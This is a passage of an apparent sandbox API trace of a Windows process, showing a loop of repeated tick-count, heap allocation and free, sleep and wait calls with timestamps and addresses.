GetTickCount () returned 0x2050f4a [0176.502] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.502] GetTickCount () returned 0x2050f4a [0176.502] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.502] GetTickCount () returned 0x2050f4a [0176.502] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.502] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.555] GetTickCount () returned 0x205181f [0176.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.555] GetTickCount () returned 0x205181f [0176.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0176.555] GetTickCount () returned 0x205181f [0176.555] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9c0 | out: hHeap=0x2150000) returned 1 [0176.555] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.622] GetTickCount () returned 0x20520f3 [0176.622] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.622] GetTickCount () returned 0x20520f3 [0176.622] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c930 [0176.622] GetTickCount () returned 0x20520f3 [0176.622] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c930 | out: hHeap=0x2150000) returned 1 [0176.622] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.672] GetTickCount () returned 0x20529b8 [0176.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.672] GetTickCount () returned 0x20529b8 [0176.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0176.672] GetTickCount () returned 0x20529b8 [0176.672] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0176.672] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.693] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.717] GetTickCount () returned 0x205327d [0176.717] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.717] GetTickCount () returned 0x205327d [0176.717] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cd50 [0176.717] GetTickCount () returned 0x205327d [0176.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cd50 | out: hHeap=0x2150000) returned 1 [0176.717] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.760] GetTickCount () returned 0x2053b42 [0176.760] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.760] GetTickCount () returned 0x2053b42 [0176.760] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0176.760] GetTickCount () returned 0x2053b42 [0176.761] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0176.761] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.808] GetTickCount () returned 0x2054407 [0176.808] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.808] GetTickCount () returned 0x2054407 [0176.808] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.808] GetTickCount () returned 0x2054407 [0176.808] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.808] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.853] GetTickCount () returned 0x2054ccb [0176.853] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.854] GetTickCount () returned 0x2054ccb [0176.854] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.854] GetTickCount () returned 0x2054ccb [0176.854] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.854] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.957] GetTickCount () returned 0x20555bf [0176.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41310 [0176.957] GetTickCount () returned 0x20555bf [0176.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0176.957] GetTickCount () returned 0x20555bf [0176.957] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0176.957] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41310 | out: hHeap=0x2150000) returned 1 [0176.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0177.004] GetTickCount () returned 0x2055e84 [0177.004] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41310 [0177.004] GetTickCount () returned 0x2055e84 [0177.004] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0177.005] GetTickCount () returned 0x2055e84 [0177.005] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0177.005] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41310 | out: hHeap=0x2150000) returned 1 [0177.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0177.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0177.581] GetTickCount () returned 0x205695c [0177.581] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41310 [0177.581] GetTickCount () returned 0x205695c [0177.581] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c360 [0177.581] GetTickCount () returned 0x205695c [0177.581] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c360 | out: hHeap=0x2150000) returned 1 [0177.581] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41310 | out: hHeap=0x2150000) returned 1 [0177.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0177.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0177.826] GetTickCount () returned 0x20572ec [0177.826] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41310 [0177.826] GetTickCount () returned 0x20572ec [0177.826] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0177.826] GetTickCount () returned 0x20572ec [0177.826] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0177.826] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41310 | out: hHeap=0x2150000) returned 1 [0177.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0177.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.658] GetTickCount () returned 0x2057ebe [0178.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41310 [0178.658] GetTickCount () returned 0x2057ebe [0178.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9f0 [0178.658] GetTickCount () returned 0x2057ebe [0178.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9f0 | out: hHeap=0x2150000) returned 1 [0178.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41310 | out: hHeap=0x2150000) returned 1 [0178.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.716] GetTickCount () returned 0x2058793 [0178.716] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41330 [0178.716] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.716] GetTickCount () returned 0x2058793 [0178.716] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0178.716] GetTickCount () returned 0x2058793 [0178.716] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0178.716] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41330 | out: hHeap=0x2150000) returned 1 [0178.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.719] GetTickCount () returned 0x2059029 [0178.719] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41330 [0178.719] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.720] GetTickCount () returned 0x2059029 [0178.720] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0178.720] GetTickCount () returned 0x2059029 [0178.720] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0178.720] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41330 | out: hHeap=0x2150000) returned 1 [0178.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.722] GetTickCount () returned 0x20598bf [0178.722] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41330 [0178.722] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.723] GetTickCount () returned 0x20598bf [0178.723] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0178.723] GetTickCount () returned 0x20598bf [0178.723] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0178.723] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41330 | out: hHeap=0x2150000) returned 1 [0178.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.732] GetTickCount () returned 0x205a164 [0178.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41330 [0178.733] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.733] GetTickCount () returned 0x205a164 [0178.733] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0178.733] GetTickCount () returned 0x205a164 [0178.733] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9c0 | out: hHeap=0x2150000) returned 1 [0178.733] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41330 | out: hHeap=0x2150000) returned 1 [0178.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.736] GetTickCount () returned 0x205a9fa [0178.736] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41330 [0178.737] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.737] GetTickCount () returned 0x205a9fa [0178.737] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c420 [0178.737] GetTickCount () returned 0x205a9fa [0178.737] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c420 | out: hHeap=0x2150000) returned 1 [0178.737] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41330 | out: hHeap=0x2150000) returned 1 [0178.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.739] GetTickCount () returned 0x205b290 [0178.739] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41330 [0178.739] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.740] GetTickCount () returned 0x205b290 [0178.740] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0178.740] GetTickCount () returned 0x205b290 [0178.740] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0178.740] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41330 | out: hHeap=0x2150000) returned 1 [0178.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.742] GetTickCount () returned 0x205bb36 [0178.742] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41330 [0178.742] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.743] GetTickCount () returned 0x205bb36 [0178.743] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c690 [0178.743] GetTickCount () returned 0x205bb36 [0178.743] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c690 | out: hHeap=0x2150000) returned 1 [0178.743] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41330 | out: hHeap=0x2150000) returned 1 [0178.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.759] GetTickCount () returned 0x205c3dc [0178.759] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41330 [0178.759] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.759] GetTickCount () returned 0x205c3dc [0178.759] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0178.759] GetTickCount () returned 0x205c3dc [0178.759] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0178.759] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41330 | out: hHeap=0x2150000) returned 1 [0178.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.787] GetTickCount () returned 0x205cc81 [0178.787] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.787] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.787] GetTickCount () returned 0x205cc81 [0178.787] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cd50 [0178.787] GetTickCount () returned 0x205cc81 [0178.787] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cd50 | out: hHeap=0x2150000) returned 1 [0178.787] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.791] GetTickCount () returned 0x205d527 [0178.791] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.791] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.792] GetTickCount () returned 0x205d527 [0178.792] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0178.792] GetTickCount () returned 0x205d527 [0178.792] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0178.792] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.794] GetTickCount () returned 0x205ddbd [0178.794] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.794] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.795] GetTickCount () returned 0x205ddbd [0178.795] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ccf0 [0178.795] GetTickCount () returned 0x205ddbd [0178.795] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ccf0 | out: hHeap=0x2150000) returned 1 [0178.795] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.797] GetTickCount () returned 0x205e653 [0178.797] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.797] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.798] GetTickCount () returned 0x205e653 [0178.798] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0178.798] GetTickCount () returned 0x205e653 [0178.798] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0178.798] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.801] GetTickCount () returned 0x205eee9 [0178.801] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.801] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.801] GetTickCount () returned 0x205eee9 [0178.801] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cea0 [0178.801] GetTickCount () returned 0x205eee9 [0178.801] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cea0 | out: hHeap=0x2150000) returned 1 [0178.801] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.805] GetTickCount () returned 0x205f78f [0178.805] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.805] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.805] GetTickCount () returned 0x205f78f [0178.805] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0178.805] GetTickCount () returned 0x205f78f [0178.805] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0178.805] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.808] GetTickCount () returned 0x2060025 [0178.808] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.808] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.808] GetTickCount () returned 0x2060025 [0178.808] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cd50 [0178.808] GetTickCount () returned 0x2060025 [0178.808] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cd50 | out: hHeap=0x2150000) returned 1 [0178.808] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.811] GetTickCount () returned 0x20608bb [0178.811] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.811] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.811] GetTickCount () returned 0x20608bb [0178.811] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0178.811] GetTickCount () returned 0x20608bb [0178.811] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0178.811] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.814] GetTickCount () returned 0x2061151 [0178.814] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.814] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.814] GetTickCount () returned 0x2061151 [0178.814] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0178.814] GetTickCount () returned 0x2061151 [0178.814] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0178.814] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.817] GetTickCount () returned 0x20619e7 [0178.817] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.817] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.817] GetTickCount () returned 0x20619e7 [0178.817] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c3f0 [0178.817] GetTickCount () returned 0x20619e7 [0178.817] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c3f0 | out: hHeap=0x2150000) returned 1 [0178.817] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.821] GetTickCount () returned 0x206228c [0178.821] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.821] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.822] GetTickCount () returned 0x206228c [0178.822] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c360 [0178.822] GetTickCount () returned 0x206228c [0178.822] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c360 | out: hHeap=0x2150000) returned 1 [0178.822] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.824] GetTickCount () returned 0x2062b22 [0178.824] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.824] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.825] GetTickCount () returned 0x2062b22 [0178.825] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0178.825] GetTickCount () returned 0x2062b22 [0178.825] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9c0 | out: hHeap=0x2150000) returned 1 [0178.825] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.827] GetTickCount () returned 0x20633b8 [0178.827] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.827] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.828] GetTickCount () returned 0x20633b8 [0178.828] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0178.828] GetTickCount () returned 0x20633b8 [0178.828] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0178.828] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.830] GetTickCount () returned 0x2063c4e [0178.830] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.830] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.831] GetTickCount () returned 0x2063c4e [0178.831] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c8d0 [0178.831] 